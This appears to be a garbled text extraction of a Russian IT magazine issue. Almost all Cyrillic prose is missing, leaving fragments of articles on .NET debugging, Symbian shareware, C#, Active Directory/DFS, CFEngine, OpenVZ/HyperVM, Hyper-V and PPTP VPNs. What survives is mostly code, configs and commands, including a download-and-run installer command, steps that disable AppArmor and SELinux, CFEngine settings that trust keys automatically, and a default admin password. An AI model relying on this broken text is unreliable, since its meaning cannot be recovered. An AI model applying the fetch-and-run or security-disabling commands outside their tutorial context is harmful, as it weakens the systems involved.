, , System.Diagnostics.Debug.
, .NET , Assert(), ,
:
System.Diagnostics.Debug.Assert(, ...)
: System.Diagnostics
ILDASM
StackTrace,
.
GetFrame(0)
StackTrace ,
, GetMethod()
MethodBase,
.
:
StackTrace stack = new StackTrace(0);
for (int i = 0; i < stack.FrameCount; i++)
{
    Console.WriteLine(stack.GetFrame(i).GetMethod().Name);
}
, , .
StackTrace,
, StackTrace
Exception. , .
StackTrace Exception
() .NET FRAMEWORK
(. . )
IL- (executive)
. ,
CLR. CLR ,
throw.
, CLR . ,
catch StackTrace ,
CLR. CLR
, ,
, .
Visual Studio
(managed) .
,
Unmanaged code debugging.
,
, .
, .NET
Framework 2.0
WinDBG.
! z
CODING
root@dtarasov.ru
,
shareware
Symbian.
, , ,
:).
SHAREWARE
Shareware
, (
)
(-, .
:) . .).
,
. ,
( ),
,
,
. 99,99%
( ),
,
,
.
, Shareware, , ,
:
,
;
( );
, ,
;
; .
10
,
. ,
:
;
(
);
( ,
);
;
;
.
, , , Nokia --
.
.
Symbian. ,
SHAREWARE
SYMBIAN
, , .
,
.
,
. ,
.
SYMBIAN?
target-
. .
. Symbian (
50%),
, , ,
. ,
Symbian
,
(/
SMS, , ).
, .
, ,
Symbian , ,
,
.
, 30%
. 70% ,
, ,
- .
,
, .
, ,
.
, , .
.
,
.
, ( ) ,
.
.
.
,
.
Symbian-, .
SYMBIAN
,
:
- .
,
Hello World.
- ++,
.
. ,
forum.nokia.com, ,
Developing
Series 60 Applications. A guide for Symbian OS
C++ Developers, Symbian Press.
. , ,
.
,
:).
,
, ++.
Symbian.
Nokia N97,
. ,
S60 , -
,
,
. ,
,
S60, .
.
, IDE, , Carbide.C++
. -
Nokia Microsoft Visual
Studio.NET. ,
SDK
.
-
, , ,
.
Symbian ,
-
, .
Symbian,
,
. ,
Symbian,
/++ ( ),
Qt. Qt
, ,
UI.
Symbian ++.
,
,
.
, ,
, ,
. ,
, ,
sms/mms,
, ,
, , .
,
,
.
,
,
.
,
.
, , , .
Blacklist Mobile.
, Symbian.
. ,
,
.
?
,
. ,
,
.
.
: ,
SMS
.
30 , 10 .
,
.
, Symbian, .
,
Symbian
(, ),
, .
,
.
Openbit,
,
. Openbit License Manager
,
,
premium sms (
100 ),
. .
2500
10% .
,
. , ,
.
95%
,
. .
, , , ?
-
. , ,
,
.
50%
!, .
,
,
. Handango, Symbiangear,
Cellmania, .
, . , ,
-, .
Ovi Store Nokia.
,
Nokia.
.
Symbian-.
-
Softkey.
, ,
-,
,
. , Softkey Nokia:
Nokia
,
.
Nokia
,
. , . :
, ,
,
. ,
. ,
,
.
.
. ,
, . -
, ,
(
pre-loading).
,
, .
,
.
.
Openbit
50000 .
. ,
, .
, .
.
. , ,
,
,
.
,
,
. ,
, , .
,
,
,
.
.
SBSH Software (http://sbsn.net).
, 30% .
-
, . ,
,
. ,
,
.
, , ,
. ,
.
Windows Mobile
,
Windows.
WM, . , , (-,
. .).
.
iPhone Symbian , ,
,
AppStore
( jailbreak
1-3 ),
,
. ,
.
Android
, . , , ,
Symbian. Symbian^4
,
Symbian .
, Java, .
Blackberry ,
, Java. , ,
. Maemo
, , Nokia.
, , . ,
, ,
. Java2ME
.
.
- ,
, .
,
.
,
, .
,
,
. ,
, ,
.
, ,
. . . z
CODING
stannic.man@gmail.com
C#
, .
][,
C#
:).
,
C#,
.
. ,
( ),
. readonly-, .
IS IsSubclassOf()?
C#
readonly ( ):
public readonly int ReadonlyValue = 1;
public const int ConstValue = 1;
?
, readonly
.
, , ,
is IsSubclassOf()? , ,
?
-, is
,
MSIL asclass,
IsSubclassOf()
. is ,
null,
IsSubclassOf() . , is
, ,
IsSubclassOf() .
C#
: as
. ,
.
-
,
NullReferenceException,
as null.
,
as,
NullReferenceException, - .
.
/OPTIMIZE /DEBUG
C#
:
C#?
get/set . ,
.
-, , , - :
set { param1 = value; DoSomeWorkOnChanged(); }
-, , :
set { if (value > 0) param1 = value; }.
-, ,
, , ,
:
get { return ReadFormDB(param1); }
set { WriteToDB(param1, value); }
Win32-
Win32.
C#?
Windows.Forms.IMessageFilter.
m.LParam m.WParam:
Win32-
public class Win32MessageFilter : System.Windows.Forms.IMessageFilter
{
    // IMessageFilter declares a single method, PreFilterMessage
    public bool PreFilterMessage(ref Message m)
    {
        // 513 (0x0201) is WM_LBUTTONDOWN
        if (m.Msg == 513)
        {
            MessageBox.Show("Win32 message WM_LBUTTONDOWN");
            return true;   // message handled, stop further dispatch
        }
        return false;
    }
}
static Win32MessageFilter filter = new Win32MessageFilter();
static void Main()
{
    Application.AddMessageFilter(filter);
    Application.Run(new Form1());
}
,
.
checked unchecked
C# checked unchecked,
. checked-:
byte a = 1;
byte b = 255;
checked
{
    byte c = (byte)(a + b);   // 256 does not fit in a byte: OverflowException in a checked context
    byte d = Convert.ToByte(a + b);
    Console.WriteLine("{0} {1}", b + 1, c);
}
,
/checked ,
unchecked ,
.
( , ,
(). ,
.NET Framework
.
System.Object Equals, true
.
Object:
Equals
public class Object
{
public virtual Boolean Equals( Object obj )
{
if( this == obj ) return true;
return false;
}
}
, ? Equals
, .
, Equals Object
,
. , Equals:
Equals
public class Object
{
public virtual Boolean Equals( Object obj )
{
if ( obj == null ) return false;
if ( this.GetType() != obj.GetType() )
return false;
return true;
}
}
Equals() .
.NET , , ,
Object.ReferenceEquals().
, ,
. ,
,
. () (,
, ;)), ,
.NET- ,
.
.NET
.
, ,
; :
, CLR .
, .
SetMaxThreads GetMinThreads. , ,
SetMaxThreads,
, .
25 ,
.
, , CLR
500 . ,
SetMinThreads,
.
, ,
500 . z
SYN/ACK
grinder grinder@synack.ru
urban.prankster martin@synack.ru
. , ,
.
, ,
.
,
.
ACTIVE DIRECTORY
-.
.
, ,
( ,
), , WiFi,
.
,
. , 1
. ,
.
,
.
- , .
,
.
,
,
, , . :
, ,
.
,
.
,
.
,
.
.
, , ,
.
(. Active
Directory ][ 04.2007 AD ][
11.2008), .
, Active Directory, Active Directory (dcpromo)
, : ,
( ), ,
( ), ,
,
-, .
,
, ,
.
, . , ,
, , ,
, , .
, , , .
-
, ,
.
,
NTFS , , , .
,
, . . ,
RDP
,
( Windows
, ][).
, ( ,
). , ,
,
. , , ,
. ,
(Read-Only Domain Controller,
RODC),
, RODC
.
, .
.
,
. (Distributed File System, DFS). ,
,
, . ,
,
, ,
. , (Remote Differential
Compression RDC), ,
. ,
, ,
.
, DFS Active Directory
Standalone (), ,
, DFS.
,
][ 2007 , DFS
Win2k3. Win2k8/R2 DFS ,
. DFS
.
DFS DFS.
Namespace .
. Active
Directory, .
, (
),
. , ,
. ,
.
.
:
> ServerManagerCmd -install FS-DFS FS-DFS-Namespace FS-DFS-Replication
DFS,
. , , .
, DFS
. ,
.
, . ,
,
.
, , . DFS, Win2k8,
,
. , .
, , , , (,
DFS
-, ), .
, ,
,
.
,
, ,
, .
, .
.
:
.doc , ,
. (Enable Access-Based
Active
Directory
Active Directory ,
. , Microsoft .
Microsoft Assessment and Planning Toolkit ,
( , WMI) , ,
(Hyper-V, SQL ). Active Directory ,
.
Active Directory Sizer tool, ( , , Exchange) . , Active Directory Sizer
tool Win2k,
.
ADTest.exe Active
Directory .
, .
Active Directory Migration Tool (ADMT), ,
.
.
Enumeration, ABDE)
. ABDE
.
:
DFS ,
,
. ABDE
. . dfsutil. :
> dfsutil property ABDE \\synack.ru\Namespace1
\\synack.ru\Namespace1: ABDE
:
> dfsutil property acl grant \\srv1\Namespace1\docs "SYNACK\Domain Admins":R Protect Replace
:
Win2k8/Vista,
.
.
DFS . ,
Win2k8 SYSVOL
DFS.
,
.
DFS RODC, DFS
SYSVOL
.
Win2k8R2 ,
DFS
. DFS
, Standalone,
Domain-based DFS.
,
, .
: ,
RDP,
. , , .
,
TS (Terminal Services)
, . Win2k Win2k3
,
Win2k8 ,
TS. RemoteApp,
, -
(TS Web Access) (TS Gateway) ( TS Win2k8
][ 09.2008).
Win2k8R2 Virtual Desktop
Infrastructure (VDI), ( ) ,
.
, R2 Terminal Services
(Remote Desktop Services, RDS),
. .
RDS Win2k8R2,
. ,
, . ,
,
. RDS , , .
VDI Hyper-V,
, ( Hyper-V
, ][ 02.2009).
,
.
, CredSSP ( Vista ),
RDS
.
,
,
DoS-
. .
, - ,
, Aero (,
).
RDS
, .
. ,
(, ,
),
Windows ( / -), ,
( ).
NAP ( ][ 12.2008).
,
,
.
- RDS.
(RD Connection Broker, Win2k8
), ,
( Win2k3 Session
Directory ( )).
,
- (
).
( -
INFO
info
:
Win2k3
Active
Directory, ][_04_2007.
Win2k8 AD, ][_11_2008.
Hyper-V
,
][_02_2009.
Terminal
Services Win2k8
, ][_09_2008.
NAP
,
][_12_2008.
NLB
Win2k3 ,
][_02_2008.
Failover
Cluster Win2k8
,
][_10_2008.
Windows
- .
.
IIS
HTTP://WWW
links
Microsoft, Win2k8R2
www.microsoft.com/windowsserver2008/ru/ru.
), , ,
. , ,
.
.
.
. 100,
50,
, . IP-,
IP-, . , , . ,
:
IIS - , ,
,
-
.
, ,
. Win2k8/R2
IIS 7.,
,
-. IIS
, .
40 IIS, 8
, .
XML- ( %systemroot%\windows\system32\inetsrv\config)
( IIS
Apache), - (
xcopy). .
(Shared Configuration), (AppHost.config), UNC
, -,
-.
,
(
NTFS ). IIS
. ,
, ,
.
,
. ,
. - .
(
, ),
.
IIS, .
DFS
( ) , -.
Network Load Balancing (NLB)
-.
, , , ,
.
, ,
.
. z
SYN/ACK
j1m@synack.ru
CFENGINE 2
,
,
.
dssh rsync ,
. ,
.
CFENGINE (CONFIGURATION ENGINE)
,
. CFEngine
,
. .CFEngine
,
, / , / , , .
,
,
.
CFEngine
, ,
.
,
,
. ,
,
,
CFEngine 2.
, CFEngine
UNIX- Linux-,
. ,
Debian/Ubuntu
:
$ sudo apt-get install cfengine2
CFEngine
:
(cfservd)
(cfagent)
(cfexecd)
cfservd ,
, .
cfagent,
CFEngine-, . ,
( ,
, . .).
cfexecd
-.
/ .
, CFEngine
, . cfrun,
( ).
cfkey
"/ ",
. cfenvd , ,
, ,
..
cfagent
, cfenvgraph
. Cfshow
CFEngine
.
var (/var/lib/cfengine2),
:
CFEngine 2
bin , /usr/
sbin
inputs ,
/etc/cfengine2
modules
ppkeys
state CFEngine
[Figure: CFEngine components. Policy server (cfservd) with cfrun and cfagent; clients (cfservd, cfexecd); files update.conf and cfservd.conf]
CFEngine
, . ,
, :
.
.
, .
.
.
, .
.
, ,
,
.
,
. ,
,
.
-,
. ,
apache
, ,
apt-get install apache2,
httpd.conf.
. CFEngine , , . :
cfagent.conf
cfrun.hosts
cfservd.conf
:
class1::
# 'class1'
class2|class3::
# 'class2|class3'
, .
CFEngine 20
, files,
, editfiles
, packages . ,
, , . ,
- . , .
, . ,
. "" , CFEngine -,
,
. - control,
, ,
actionsequence. :
$ sudo vi /tmp/sample.conf
control:
  actionsequence = ( files )
files:
  /etc/shadow owner=root group=shadow mode=0640 action=fixall
,
:
1 files (
).
2 files
/etc/shadow
, (0640, root, shadow).
(, /tmp/sample.
conf) :
$ sudo cfagent -f /tmp/sample.conf
,
files
MD5- ,
( tripwire).
mountall
, fstab
mountinfo
checktimezone
netconfig
resolve /etc/
resolv.conf
unmount
packages //
shellcommands
editfiles
addmounts
directories
links
mailcheck
required
tidy
disable
files
copy
processes
module:name
,
//
. Linux /etc/shadow, root:shadow, , ,
FreeBSD :
/etc/master.passwd root:wheel.
?
().
Linux-, FreeBSD:
$ sudo vi /tmp/sample.conf
control:
actionsequence = ( files )
files:
linux::
  /etc/shadow owner=root group=shadow mode=0440 action=fixall
freebsd::
  /etc/master.passwd owner=root group=wheel mode=0440 action=fixall
, , ,
CFEngine
, ,
.
, , :
$ sudo cfagent -pv
, . CFEngine
libc,
, .
,
(, Hr00 , Hr12
..),
.
CFEngine ,
.
:
$ sudo vi /tmp/sample.conf
control:
  actionsequence = ( shellcommands )
classes:
  linux_sys = ( IsDir(/sys) )
shellcommands:
linux_sys::
  "/bin/echo /sys "
- classes linux_sys,
,
/sys .
CFEngine , . cfkey .
/var/lib/cfengine2/ppkeys: localhost.pub ( ) localhost.priv (
).
- /var/lib/cfengine2/ppkeys/IP-.pub.
/var/lib/cfengine2/ppkeys/root-IP-.pub.
cfkey
IsDir ,
. CFEngine
,
:
HTTP://WWW
links
www.freesource.ru/dokumentaciya/cfengine
CFEngine2
www.cfengine.org/manuals/cf2Reference.html
CFengine2
INFO
info
cron.
control
cfagent.conf
:
Schedule = ( Min30_35 )
classes
IsNewerThan(f1,f2) , f1
f2
FileExists(f) , f
IPRange() IP- IP-
IsDefined()
IsDir(f) f
IsLink(f) f
IsPlain(f) f
Regcmp(re, ) re
Strcmp(s1,s2)
CFEngine,
:
1 CFEngine.
2 ,
CFEngine.
3 .
, ,
"". ,
.
, .
,
CFEngine ,
.
,
.
cfengine2
Ubuntu
:
1 cfagent.conf (
).
2 cfservd.conf , .
3 cfrun.hosts ().
.
:
$ sudo vi /etc/cfengine2/cfagent.conf
# Global settings
control:
  # Order in which the action sections run
  actionsequence = ( resolve files tidy processes )
  # Domain name
  domain = ( xakep.ru )
  # Time zone
  timezone = ( MSK )
  # SMTP server and administrator e-mail for reports
  smtpserver = ( smtp.xakep.ru )
  sysadm = ( admin@xakep.ru )
# Name servers for resolv.conf
resolve:
  192.168.1.1
  192.168.1.2
# Ownership and permissions of critical files
files:
  /etc/sudoers mode=440 owner=root group=root action=fixall
  /etc/passwd mode=644 owner=root group=root action=fixall
  /etc/shadow mode=640 owner=root group=shadow action=fixall
# Remove old files
tidy:
  /tmp pattern=* age=7 recurse=inf
  /home pattern=*~ age=7 recurse=inf
# Process management
processes:
  # Send SIGHUP to inetd
  "inetd" signal=hup
web-
Web- CFEngine
CFEngine,
,
.
cfservd.conf
:
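$ sudo vi /etc/cfengine2/cfservd.conf
control:
  domain = ( xakep.ru )
  # Accept new public keys on trust from this subnet
  TrustKeysFrom = ( 192.168.1.0/24 )
any::
  # Maximum number of simultaneous connections
  MaxConnections = ( 50 )
grant:
  # Hosts in xakep.ru may read the policy directory
  /var/lib/cfengine2/inputs *.xakep.ru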
, :
. , cfrun.hosts
:
$ sudo vi /etc/cfengine2/cfrun.hosts
domain = xakep.ru
#
srv1.xakep.ru
srv2.xakep.ru
, CFEngine:
$ sudo /etc/init.d/cfengine2 restart
update.conf.
,
cfagent.conf. :
$ sudo vi /etc/cfengine2/cfservd.conf
control:
  domain = ( xakep.ru )
  # Subnet allowed to connect, and whose keys are accepted on trust
  AllowConnectionsFrom = ( 192.168.1.0/24 )
  TrustKeysFrom = ( 192.168.1.0/24 )
  # Path to cfagent, started on request from cfrun
  cfrunCommand = ( "/usr/sbin/cfagent" )
  MaxConnections = ( 50 )
grant:
  /usr/sbin/cfagent *.xakep.ru
$ sudo vi /etc/cfengine2/update.conf
control:
actionsequence = ( copy )
domain = ( xakep.ru )
CFEngine :
# Policy server
policyhost = ( cfserver.xakep.ru )
# Policy directory on the server
master_cfinput = ( /var/lib/cfengine2/inputs )
# Directory for backup copies of replaced files
repository = ( /var/lib/cfengine2/outputs )
, CFEngine
.
# Copy cfagent.conf from the policy server into /etc/cfengine2
copy:
  $(master_cfinput)/cfagent.conf
    dest=/etc/cfengine2/cfagent.conf
    mode=600
    server=$(policyhost)
    force=true
    trustkey=true
,
CFEngine, ,
,
.
:
$ sudo crontab -e
0,30 * * * * /var/cfengine/bin/cfexecd -F
cron cfexecd,
CFEngine,
cfagent.conf
.
cfagent.conf ,
.
CFEngine ,
.
CFEngine ,
.
WWW
, , CFEngine. z
SYN/ACK
Nathan Binkert nat@synack.ru
>> SYN/ACK
PLANET VIP-882:
VoIP-
IP- PLANET
VIP-88x
> :
T.30, T.38
> :
1 WAN 10/100 Mbps RJ-45
1 LAN 10/100 Mbps RJ-45
8 RJ-11 (6xFXS, 2xFXO)
> :
Voice activity detection (VAD)
Comfort noise generation (CNG)
G.165/G.168 Echo cancellation
Dynamic Jitter Buffer
> :
H.323 v2/v3/v4 SIP (RFC 3261), SDP (RFC
2327), Symmetric RTP, STUN (RFC3489),
ENUM (RFC 2916), RTP Payload for DTMF
Digits (RFC2833), Outbound Proxy Support
> :
TCP/IP, UDP/RTP/RTCP, HTTP, ICMP, ARP,
NAT, DHCP, PPPoE, DNS
> :
G.711 (A-law / u-law), G.729 AB, G.723 (6,3
Kbps / 5,3 Kbps)
> :
QoS
IP TOS (IP Precedence) / DiffServ
NAT
> :
IP, PPPoE, DHCP
> :
WEB, RS-232 , Telnet
> :
12
> ( x x ):
300 x 160 x 40
.
PLANET VIP-882 NAT,
.
VoIP- (QoS)
-. VoIP-
DHCP-, SNTP-, DynDNS-,
Syslog- ( Web, FTP
), , VIP882,
.
IP- 15300 .
HP ProLiant ML110 G6:
,
HP ProLiant ML110 G6
> ( ):
Intel Xeon X3430 (2.40 , 95 TDP, 8
, 1333 , Turbo 1/1/2/3)
Intel Xeon X3440 (2.53 , 95 TDP, 8
, 1333 , HT, Turbo 1/1/2/3)
Intel Xeon X3450 (2.66 , 95 TDP, 8
, 1333 , HT, Turbo 1/1/4/4)
Intel Xeon X3460 (2.80 , 95 TDP, 8
, 1333 , HT, Turbo 1/1/4/5)
> :
8 DDR3 PC3-10600E 1333 ,
4
> :
SATA- (4
)
SAS 3.5" 1,8
SATA 3.5" 3
> :
PCI-e Gen 1, x1 (x4 connector),
> :
NC107i
> :
1
1
> :
300
> :
Micro ATX (4U)
HP
, .
,
,
, , HP ProLiant ML110 G6
.
Intel Xeon
X3400 ( , ), Intel Turbo Boost,
, DDR3,
1333 . SATA-
SAS/SATA, 1,8
3 .
PCI
Express ( ) PCI. USB-,
.
HP Tower to Rack
Conversion Tray.
HP, ML110 G6 Lights-Out 100i,
, , ,
, KVM, , telnet,
,
SYN/ACK
grinder grinder@synack.ru
, , , . , ,
. ,
.
OPENVZ
: ,
,
.
OpenVZ (OpenVZ.
org) Linux, (Virtual
Environments, VE). ,
VE ( , ,
).
OpenVZ :
Linux.
( 4096
64 ),
,
1-3%.
,
, (venet)
IP . OpenVZ
:
,
,
.
OpenVZ Ubuntu/
Debian. 64-,
64- .
32- (, 4 )
. Ubuntu
LVM,
(Zero Downtime
Backup)
.
SELinux AppArmor. :
$ dmesg | grep SELinux
SELinux: Disabled at boot.
$ dmesg | grep -i AppArmor
AppArmor: AppArmor initialized
AppArmor: AppArmor Filesystem
Enabled
AppArmor
:
$ sudo /etc/init.d/apparmor stop
$ sudo update-rc.d -f apparmor remove
$ sudo apt-get remove apparmor apparmor-utils
SELinux .
, selinux=0 , menu.lst: kernel .... selinux=0, /etc/sysconfig/selinux selinux=disabled. :
$ sudo setenforce 0
Ubunt' , , OpenVZ,
. ,
OpenVZ
.
OpenVZ RPM RHEL
Ubuntu 8.04 LTS.
, /etc/apt/sources.list
:
deb http://download.openvz.org/ubuntu hardy experimental
,
:
$ sudo apt-get update
$ sudo apt-cache search openvz
:
$ sudo apt-get install linux-openvz vzctl vzquota
, /etc/sysctl.conf:
:
$ sudo sysctl -p
VM IP-,
, OpenVZ NEIGHBOUR_DEVS all:
$ sudo nano /etc/vz/vz.conf
NEIGHBOUR_DEVS=all
(
):
WEBVZ
WebVZ (webvz.sf.net) OpenVZ, Ruby.
- (Webrick),
SQLite. WebVZ :
OpenVZ (, , ,
);
Host Node;
OpenVZ,
IP-;
- , , ;
OpenVZ;
VM;
;
.
, , . WebVZ
. 8887 8888
, firewall.
Ruby SQLite. Rails
(rubyonrails.org) , . ,
2.0.2,
WebVZ Rails 2.3.2 ( 2.3.5, 2.3.2). Ubuntu
Ubuntu on Rails Team (launchpad.net/~ubuntu-on-rails),
Ruby. , source.list:
, :
OpenVZ /vz.
,
:
deb http://ppa.launchpad.net/ubuntu-on-rails/ppa/ubuntu hardy main
deb-src http://ppa.launchpad.net/ubuntu-on-rails/ppa/ubuntu hardy main
, APT :
$ sudo ln -s /var/lib/vz /vz
/vz/template/cache
, ( wiki.openvz.org/Download/template/precreated).
Ubuntu:
$ wget -c http://download.openvz.org/template/precreated/contrib/ubuntu-8.04.2-i386-minimal.tar.gz
$ sudo cp -v ubuntu-8.04.2-i386-minimal.tar.gz /vz/template/cache
. ,
.
VM ,
.
OpenVZ, modernadmin.com/downloads/?d=ostemplates/xen.
:
$ sudo apt-get install ruby rubygems libsqlite3-ruby \
sqlite3 irb libopenssl-ruby libreadline-ruby rdoc
,
rubygems, ,
:
$ sudo gem update --system
gem install ,
rubygems :
HyperV_Mon
INFO
OpenVZ
info
OpenVZ
. OpenVZ
(
Linux-),
OpenVZ
:
.
Authorization Manager
(AzMan.msc)
VM
Hyper-V.
$ wget -c http://rubyforge.org/frs/download.php/60718/rubygems-1.3.5.tgz
$ tar xzvf rubygems-1.3.5.tgz
$ cd rubygems-1.3.5
$ sudo ruby setup.rb
$ sudo ln -s /usr/bin/gem1.8 /usr/bin/gem
-v=2.3.2,
, WebVZ
,
RAILS_GEM_VERSION config/environment.rb.
:
$ rails -v
Rails 2.3.5
WebVZ .
WebVZ.
, Git.
:
$ sudo apt-get install git-core
WebVZ:
$ git clone git://github.com/shuaibzahda/webvz.git
DVD
dvd
,
OpenVZ + WebVZ
Ubuntu Linux.
webvz , /var. ,
:
$ cd webvz/
$ sudo ruby script/server
=> Booting WEBrick
=> Rails 2.3.5 application starting on http://0.0.0.0:3000
=> Call with -d to detach
=> Ctrl-C to shutdown server
[2010-01-29 14:08:01] INFO WEBrick 1.3.1
, ,
, WebVZ
. ,
, '-d':
$ sudo ruby script/server -d
=> Booting WEBrick
=> Rails 2.3.5 application starting on http://0.0.0.0:3000
/etc/init.d/webvz:
cd /usr/local/webvz/ && /usr/bin/ruby script/server -d
exit 0
: http://192.168.1.200:3000/. ,
admin admin123. WebVZ Containers,
OS-Templates, Configuration files, OpenVZ ( )
Users.
Containers Personalize ( ). 3-4
.
Users, , , .
admin,
Change Password.
Vtonf
Vtonf (http://sourceforge.net/projects/vtonf)
-
OpenVZ.
. Vtonf RedHat, Fedora
CentOS.
Live Migration
WebVZ
,
(Administration) (Client).
OS-Templates OpenVZ. ,
, ,
,
OpenVZ.
, Containers
New Container ,
,
, , ID, , IP-, , DNS-
root. Create
.
- . , , , ,
.
OS-Templates Re-Create Template,
.
HYPERVM
HyperVM (lxcenter.org)
,
(VPS/VDS). ,
-, .
, HyperVM
Proxmox Virtual
Environment
Proxmox VE (http://pve.proxmox.com/wiki/Main_Page) Linux
OpenVZ KVM.
web-
,
.
1.5
GPLv2
ISO- 327
DVD-.
,
. ,
, ,
. ,
?
. Live Migration.
Hyper-V, XenEnterprise, VMware ( VMotion). (
60300 ), , VM
, TCP- .
: VM , ,
. VM, , .
, , .
VM ,
, .
,
- .
OpenVZ Xen.
, .
(Resource Plan),
: VPS,
, , .
Xen, OpenVZ,
,
,
OpenVZ Only Xen Only.
HyperVM ,
SSH, ,
, .
, Ajax.
IP-, , .
HyperVM ,
- Vaserv (
2009) LxLabs AGPL-3.0,
SVN .
, RHEL-based
( CentOS).
, : This Operating
System is Currently Not supported.
( virtualization-type xen/openvz/NONE):
HTTP://WWW
links
OpenVZ
openvz.org
OpenVZ wiki.openvz.org/Download/template/precreated
WebVZ webvz.sf.net
HyperVM
lxcenter.org
HyperVM :
http://demo.hypervm.com:8888
SCVMM
2008 microsoft.com/systemcenter/virtualmachinemanager
PowerShell
management Library
for Hyper-V pshyperv.codeplex.com
HVRemote code.msdn.microsoft.com/HVRemote
WebVZ
$ wget -c http://download.lxcenter.org/download/hypervm/production/hypervm-install-master.sh
$ sudo sh ./hypervm-install-master.sh --virtualization-type=openvz
. , hypervm-install-master.sh ,
hypervm-install-slave.sh.
HYPER-V
Microsoft Hyper-V,
Windows 2008 , Microsoft Hyper-V Server 2008
(, , ). Hyper-V
(X_02_2009),
,
,
.
Hyper-V
, Hyper-V Tools,
Hyper-V , Hyper-V
(Hyper-V Manager). ,
Win2k8 , Hyper-V.
, ,
,
(Server Core). Vista Hyper-V
(support.microsoft.com/kb/952627 support.microsoft.com/kb/970203). Win7
, Remote Server
Administration Tools for Windows 7 (RSAT),
, , Hyper-V, Active Directory,
DHCP, DNS, , RDP, BitLocker, GPO, Network Load Balancing ..
RSAT for Win7 ,
.
Windows Firewall:
HyperVM
DCOM
DCOMcnfg.exe.
-
. , Hyper-V,
HVRemote (Hyper-V Remote
Management Configuration Utility, code.msdn.microsoft.com/HVRemote).
,
, WF .
, , :
> cscript hvremote.wsf /add:synack\user
:
> cscript hvremote.wsf /remove:synack\user
MMC Windows Firewall, :
> cscript hvremote.wsf /mmc:enable
:
> cscript hvremote.wsf /show /target:computername
Hyper-V Powershell Snap in
(powershellhyperv.codeplex.com)
,
Hyper-V
.
,
Visual Studio.
PowerShell management Library for Hyper-V
(pshyperv.codeplex.com) 80
HVRemote
PowerShell-, , , VM,
, VHD-
VM.
- Hyper-V Web
Manager (HVWM, hvwm.codeplex.com),
Virtualization WMI,
VM,
.
HyperV_Mon (www.tmurgent.com/tools.aspx)
VM
, . HyperV_Mon
, , VM.
Citrix Systems
IT-,
Citrix Essentials for Hyper-V
Express Edition (deliver.citrix.com/go/citrix/ehvexpress).
Hyper-V, Fibre Channel
iSCSI .
, ,
SCVMM 2008 (System Center Virtual
Machine Manager, microsoft.com/systemcenter/virtualmachinemanager),
, Hyper-V,
Microsoft Virtual Server 2005, VMware
ESX/ESXi, .
,
,
. ,
, ,
. z
SYN/ACK
grinder grinder@synack.ru
urban.prankster martin@synack.ru
VPN
.
,
VPN , , , . , ,
, .
.
VPN ?
: -
.
,
,
. LAN
,
.
PPPoE PPTP,
host-to-network. , ?
.
PPPoE PPTP :
, *nix.
. Windows PPPoE PPTP
,
.
, , ,
.
OpenVPN,
,
- NAT.
- VPN ,
,
, ,
.
,
. L2TP/
IPsec
,
, ,
,
PPPoE PPTP /
.
VPN,
,
IP, IP ,
,
PPTP,
, OpenVPN L2TP/IPsec,
.
PPPoE PPTP .
PPPOE
PPPoE (Point-to-point protocol
over Ethernet, RFC 2516) ,
.
Windows, *nix
. , PPP
,
.
PADI- (PPPoE
Active Discovery Initiation),
,
IP- ,
PPTP. , ,
, ,
.
,
PPPoE
.
*nix pppoe-discovery,
PADI
, MAC-.
# pppoe-discovery -I eth0
Access-Concentrator: MT-01
.
PPPoE ,
,
/etc/ppp/peers/dsl-provider:
# nano /etc/ppp/peers/dsl-provider
plugin rp-pppoe.so
rp_pppoe_ac MT-01
eth0
: DHCP, DNS . PPPoE
RADIUS. PPPoE . Ethernet, IP- . ,
,
. PPPoE . ,
PPPoE WiFi : .
WiFi Wired LAN, PPPoE .
, MTU.
, Ethernet- 1500 ,
, PPPoE, 1492
( PPPoE 6 PPP Protocol ID 2 ). Path MTU Discovery,
.
ICMP (
3, 4: Fragmentation Needed and DF set, . www.oav.net/mirrors/cidr.html). , - ICMP ,
. MTU . , :
> ping synack.ru -f -l 1492
, .
, 1492 .
MTU, MSS
(Maximum Segment Size, ),
40 (20 IP 20 TCP),
MTU.
ifconfig MTU :
# ifconfig ppp0 mtu 1400
IPSEC
, .
() TCP- ( 1723).
( Generic Routing
Encapsulation, GRE).
PPPoE, PPTP
. , , IP- .
. , ,
,
. , PPTP
Windows (Microsoft
), .
*nix ,
pptp-client (pptpclient.sf.net),
. MPPE
. MPPE
. , MPPE
Linux 2.6.14,
.
: PAP, CHAP, SPAP, MSCHAP v1 v2,
EAP. /
,
PPTP
. :
LM-, RC4, CHAP, MSCHAP v1
v2 .
asleap (willhackforsushi.com/Asleap.html) PPTP
MSCHAP . , PPTP,
VPN ( , , ),
.
, PPTP
EAP-TLS (Extensible Authentication
Protocol-Transport Layer Security) . ,
,
NF_CONNTRACK_PPTP
PPTP
. ,
PPTP , VPN .
LAN,
VPN-.
,
VPN ,
.
PPTP
1723/TCP GRE
( 47):
iptables -A INPUT -p tcp -s IP_VPN_ -d _IP --sport 1723 -j ACCEPT
iptables -A INPUT -p gre -s IP_VPN_ -d _IP -j ACCEPT
iptables -A OUTPUT -d IP_VPN_ -s _IP -j ACCEPT
PF ,
(www.xakep.ru/magazine/xa/109/160/1.asp), PPTP- FreeBSD/mpd
OpenBSD/poptop.
PPTP - NAT
, PPTP
NAT.
VPN .
Linux
ip_nat_pptp, :
THEGREENBOW IPSEC VPN CLIENT
# /sbin/modprobe ip_nat_pptp
. PF . ,
GRE-,
( ) IP-
PPTP
.
, PPTP
IPFW.
:
# vi /etc/rc.conf
firewall_enable="YES"
firewall_nat_enable="YES"
firewall_script="/etc/ipfw.gre"
:
VPN
IP
KVPNC
VPN
*NIX
# vi /etc/ipfw.gre
#!/bin/sh
/sbin/ipfw -q /dev/stdin <<RULES
flush
nat 10 config if fxp0
add 10 nat 10 gre from any to any
add 11 nat 10 tcp from any to any dst-port pptp
add 12 nat 10 tcp from any pptp to any
RULES
/etc/ipfw.gre :
# chmod +x /etc/ipfw.gre
PF PPTP
:
# vi /etc/pf.conf
no nat on $external proto gre all
no nat on $external proto tcp from any \
to any port = pptp
no nat on $external proto tcp from any \
port = pptp to any
pass quick on $external inet proto tcp from any \
to any port 1723
pass quick on $external inet proto tcp from any \
port 1723 to any
pass quick on $external inet proto gre \
from any to any
. PPTP
,
, Frickin PPTP Proxy (frickin.sf.net) pptpproxy
(mgix.com/pptpproxy).
OpenBSD 4.6-current npppd,
PPP L2TP, PPTP PPPoE.
SITE-TO-SITE VPN? .
, .
, ,
. VPN ,
: OpenVPN, L2TP/IPsec, PPTP,
INFO
info
PPTP VPN
Win2k8
,
][ 2009 .
PPPoE
PPTP
Linux
PPP
(X_05_2008).
,
OpenSSH,
2008 ,
.
IPSEC
MICROSOFT
AH ( 51) Authentication Header,
.
IPsec 500
AH/ESP.
iptables:
